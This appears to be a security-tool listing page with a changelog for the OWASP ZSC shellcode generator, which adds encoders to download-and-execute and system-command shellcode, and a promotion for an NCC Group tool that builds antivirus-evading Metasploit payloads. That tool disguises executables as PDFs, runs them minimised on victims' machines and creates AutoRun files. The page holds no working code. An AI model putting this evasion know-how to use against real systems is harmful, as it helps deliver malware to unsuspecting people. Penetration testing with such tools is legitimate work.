• add xor_random encoding in dir_create() [linux_x86]
• add xor_yourvalue encoding in dir_create() [linux_x86]
• add add_random encoding in dir_create() [linux_x86]
• add add_yourvalue encoding in dir_create() [linux_x86]
• add sub_random encoding in dir_create() [linux_x86
• add sub_yourvalue encoding in dir_create() [linux_x86]
• add inc encoding in dir_create() [linux_x86]
• add inc_timesyouwant encoding in dir_create() [linux_x86
• add dec encoding in dir_create() [linux_x86]
• add dec_timesyouwant encoding in dir_create() [linux_x86]
• add mix_all encoding in dir_create() [linux_x86]
• add xor_random encoding in download() [linux_x86]
• add xor_yourvalue encoding in download() [linux_x86]
• add add_random encoding in download() [linux_x86]
• add add_yourvalue encoding in download() [linux_x86]
• add sub_random encoding in download() [linux_x86
• add sub_yourvalue encoding in download() [linux_x86]
• add inc encoding in download() [linux_x86]
• add inc_timesyouwant encoding in download() [linux_x86
• add dec encoding in download() [linux_x86]
• add dec_timesyouwant encoding in download() [linux_x86]
• add mix_all encoding in download() [linux_x86]
• add xor_random encoding in download_execute() [linux_x86]
• add xor_yourvalue encoding in download_execute() [linux_x86]
• add add_random encoding in download_execute() [linux_x86]
• add add_yourvalue encoding in download_execute() [linux_x86]
• add sub_random encoding in download_execute() [linux_x86
• add sub_yourvalue encoding in download_execute() [linux_x86]
• add inc encoding in download_execute() [linux_x86]
• add inc_timesyouwant encoding in download_execute() [linux_x86
• add dec encoding in download_execute() [linux_x86]
• add dec_timesyouwant encoding in download_execute() [linux_x86]
• add mix_all encoding in download_execute() [linux_x86]
• add xor_random encoding in system() [linux_x86]
• add xor_yourvalue encoding in system() [linux_x86]
• add add_random encoding in system() [linux_x86]
• add add_yourvalue encoding in system() [linux_x86]
• add sub_random encoding in system() [linux_x86
• add sub_yourvalue encoding in system() [linux_x86]
• add inc encoding in system() [linux_x86]
• add inc_timesyouwant encoding in system() [linux_x86
• add dec encoding in system() [linux_x86]
• add dec_timesyouwant encoding in system() [linux_x86]
• add mix_all encoding in system() [linux_x86]
• add xor_random encoding in script_executor() [linux_x86]
• add xor_yourvalue encoding in script_executor() [linux_x86]
• add add_random encoding in script_executor() [linux_x86]
• add add_yourvalue encoding in script_executor() [linux_x86]
• add sub_random encoding in script_executor() [linux_x86
• add sub_yourvalue encoding in script_executor() [linux_x86]
• add inc encoding in script_executor() [linux_x86]
• add inc_timesyouwant encoding in script_executor() [linux_x86
• add dec encoding in script_executor() [linux_x86]
• add dec_timesyouwant encoding in script_executor() [linux_x86]
• add mix_all encoding in script_executor() [linux_x86]
• add add_random encoding in write() [linux_x86]
• add xor_random encoding in write() [linux_x86]
• add sub_random encoding in write() [linux_x86]
• add xor_random encoding in exec() [linux_x86]
• add sub_random encoding in exec() [linux_x86
• add add_random encoding in exec() [linux_x86]
• fixed bug in system() when len(command) is less than 5
• fixed bug in encode module add_random chmod() [linux_x86] 

Download OWASP ZSC

Read More

Metasploit AV Evasion - Metasploit payload generator that avoids most Anti-Virus products

Metasploit payload generator that avoids most Anti-Virus products.

Installing

git clone https://github.com/nccgroup/metasploitavevasion.git

chmod +x the avoid.sh file before use.

How To Use

./avoid.sh

Then follow the on screen prompts.

Features

• Easily generate a Metasploit executable payload to bypass Anti-Virus detection
• Local or remote listener generation
• Disguises the executable file with a PDF icon
• Executable opens minimised on the victims computer
• Automatically creates AutoRun files for CDROM exploitation

Download Metasploit AV Evasion

Read More